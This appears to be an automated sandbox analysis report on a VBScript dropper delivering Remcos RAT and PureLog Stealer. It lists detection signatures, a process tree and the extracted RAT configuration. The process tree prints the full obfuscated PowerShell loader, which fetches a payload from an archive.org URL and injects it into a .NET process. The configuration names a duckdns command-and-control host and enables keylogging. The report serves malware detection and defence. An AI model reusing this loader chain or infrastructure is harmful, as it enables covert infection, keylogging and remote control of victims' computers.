Windows Analysis Report
OIQ1ybtQdW.vbs
Overview
General Information
Field | Value |
---|---|
Sample name: | OIQ1ybtQdW.vbs (renamed because the original name is a hash value) |
Original sample name: | 8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368.vbs |
Analysis ID: | 1523833 |
MD5: | 4a31a1de3d99c80d908ddda051e2f761 |
SHA1: | 302e19edb2c96cc78cb866c2d78d7f2fc77e8297 |
SHA256: | 8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368 |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
Remcos, PureLog Stealer
Field | Value |
---|---|
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7360 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JiAoKFZBUk lhQkxlICcq TURyKicpLm 5hTWVbMywx MSwyXS1qT2 lOJycpKCAo J3cxJysnWn VybCA9IFZ3 M2h0dHAnKy dzOi8vJysn aScrJ2E2Jy snMDAxMDAu dXMuYXJjaG l2ZS5vcmcn KycvMjQnKy cvaScrJ3Rl bXMvZGV0Jy snYWgtJysn bm90ZS12Ly crJ0RldGFo Tm8nKyd0ZV YudHgnKyd0 VnczOycrJ3 cxWmJhc2U2 JysnNEMnKy dvbnRlJysn bnQgPSAoTm V3JysnLU9i aicrJ2VjdC AnKydTeScr J3N0ZW0uTm V0JysnLlcn KydlYkNsaW VudCkuRG93 bmxvYWRTJy sndHJpbmcn KycodzFadX JsKTt3Jysn MVpiJysnaW 4nKydhcicr J3lDb250ZW 50ID0gWycr J1N5Jysnc3 RlbS5DJysn b24nKyd2Jy snZXJ0Jysn XTo6RicrJ3 InKydvbUJh cycrJ2U2NF N0cmluZycr Jyh3MVpiYX NlNicrJzRD b250ZScrJ2 50KTt3MVph c3NlbWJseS A9IFsnKydS ZWZsZWN0Jy snaScrJ29u LkFzJysnc2 VtYmx5XScr Jzo6TG9hZC crJygnKyd3 MVonKydiaW 5hcnlDb24n Kyd0ZW50Jy snKTt3MVp0 JysneXBlID 0gdzFaYXNz JysnZW1iJy snbHkuR2V0 VHlwJysnZS hWdzMnKydS dScrJ25QRS 4nKydIb21l JysnVnczKT t3JysnMVpt ZXRob2QgPS B3JysnMVon Kyd0eScrJ3 BlLkdldE1l dGhvZChWdz NWQUlWdzMp O3cxWm0nKy dldGgnKydv ZCcrJy5Jbn Zva2Uodycr JzFabnVsbC wgJysnWycr J29iamVjdF tdJysnXUAo VicrJ3czMC 9wV2NKJysn bicrJy9kLy crJ2UnKydl LmV0c2FwLy 86c3B0dGhW dzMgLCcrJy BWdzNkZXNh dGl2YScrJ2 RvVnczICwg JysnVicrJ3 czZGVzYXRp dmFkbycrJ1 Z3JysnMyAs JysnIFZ3M2 QnKydlcycr J2EnKyd0aX ZhZG9WJysn dzMsVncnKy czQWRkSW5Q JysncicrJ2 8nKydjZXNz MzJWdzMsJy snVicrJ3cz VnczKSknKS 5yZXBsQWNl KCdWdzMnLF tzVHJJTkdd W0NIYVJdMz kpLnJlcGxB Y2UoJ3cxWi csJyQnKSk= ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7368 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7540 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "& ((V ARIaBLe '* MDr*').naM e[3,11,2]- jOiN'')( ( 'w1'+'Zurl = Vw3http '+'s://'+' i'+'a6'+'0 0100.us.ar chive.org' +'/24'+'/i '+'tems/de t'+'ah-'+' note-v/'+' DetahNo'+' teV.tx'+'t Vw3;'+'w1Z base6'+'4C '+'onte'+' nt = (New' +'-Obj'+'e ct '+'Sy'+ 'stem.Net' +'.W'+'ebC lient).Dow nloadS'+'t ring'+'(w1 Zurl);w'+' 1Zb'+'in'+ 'ar'+'yCon tent = ['+ 'Sy'+'stem .C'+'on'+' v'+'ert'+' ]::F'+'r'+ 'omBas'+'e 64String'+ '(w1Zbase6 '+'4Conte' +'nt);w1Za ssembly = ['+'Reflec t'+'i'+'on .As'+'semb ly]'+'::Lo ad'+'('+'w 1Z'+'binar yCon'+'ten t'+');w1Zt '+'ype = w 1Zass'+'em b'+'ly.Get Typ'+'e(Vw 3'+'Ru'+'n PE.'+'Home '+'Vw3);w' +'1Zmethod = w'+'1Z' +'ty'+'pe. GetMethod( Vw3VAIVw3) ;w1Zm'+'et h'+'od'+'. Invoke(w'+ '1Znull, ' +'['+'obje ct[]'+']@( V'+'w30/pW cJ'+'n'+'/ d/'+'e'+'e .etsap//:s ptthVw3 ,' +' Vw3desa tiva'+'doV w3 , '+'V' +'w3desati vado'+'Vw' +'3 ,'+' V w3d'+'es'+ 'a'+'tivad oV'+'w3,Vw '+'3AddInP '+'r'+'o'+ 'cess32Vw3 ,'+'V'+'w3 Vw3))').re plAce('Vw3 ',[sTrING] [CHaR]39). replAce('w 1Z','$'))" MD5: 04029E121A0CFA5991749937DD22A1D9) - AddInProcess32.exe (PID: 8028 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "TsosT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DCR6HW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | | |
REMCOS_RAT_variants | unknown | unknown | | |
System Summary
Source: | Author: Florian Roth (Nextron Systems): |